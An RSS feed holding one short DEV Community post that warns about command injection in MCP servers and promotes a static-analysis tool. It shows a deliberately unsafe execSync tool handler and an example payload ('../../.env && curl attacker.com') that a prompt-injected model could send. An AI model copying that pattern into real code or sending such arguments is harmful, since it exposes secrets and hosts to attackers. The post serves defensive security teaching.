<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: VitorLourenco</title>
    <description>The latest articles on DEV Community by VitorLourenco (@vitorlourenco).</description>
    <link>https://dev.to/vitorlourenco</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3816627%2F7f28bfce-f054-4257-8cc1-09f2a6876aa7.JPG</url>
      <title>DEV Community: VitorLourenco</title>
      <link>https://dev.to/vitorlourenco</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/vitorlourenco"/>
    <language>en</language>
    <item>
      <title>Your MCP Server Is Probably Vulnerable — Here's What to Check</title>
      <dc:creator>VitorLourenco</dc:creator>
      <pubDate>Tue, 10 Mar 2026 15:18:02 +0000</pubDate>
      <link>https://dev.to/vitorlourenco/your-mcp-server-is-probably-vulnerable-heres-what-to-check-48fj</link>
      <guid>https://dev.to/vitorlourenco/your-mcp-server-is-probably-vulnerable-heres-what-to-check-48fj</guid>
      <description>&lt;p&gt;Most MCP servers I've seen are doing this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nx"&gt;server&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;run_script&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;async &lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="nx"&gt;filename&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
 &lt;span class="nf"&gt;execSync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;`node scripts/&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
 &lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's command injection. The parameter comes from an AI model — which can be manipulated through prompt injection in its context to send ../../.env &amp;amp;&amp;amp; curl attacker.com.&lt;/p&gt;

&lt;p&gt;The mental model most developers are missing: an AI model is an untrusted caller. The same validation discipline you apply to HTTP query parameters applies to MCP tool arguments. The threat model is identical — only the caller changed.&lt;/p&gt;

&lt;p&gt;We just shipped 12 static analysis checks specifically for MCP servers: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;command injection, &lt;/li&gt;
&lt;li&gt;path traversal, &lt;/li&gt;
&lt;li&gt;missing schema validation, &lt;/li&gt;
&lt;li&gt;prompt injection via tool descriptions. &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Runs automatically on JS, TS, and Python MCP code. &lt;br&gt;
No config, no API key.&lt;/p&gt;

&lt;p&gt;Full breakdown of what we detect and why it matters:&lt;br&gt;
 --&amp;gt; &lt;a href="https://codeslick.dev/blog/mcp-server-security" rel="noopener noreferrer"&gt;https://codeslick.dev/blog/mcp-server-security&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you're building MCP servers, this is worth 5 minutes.&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
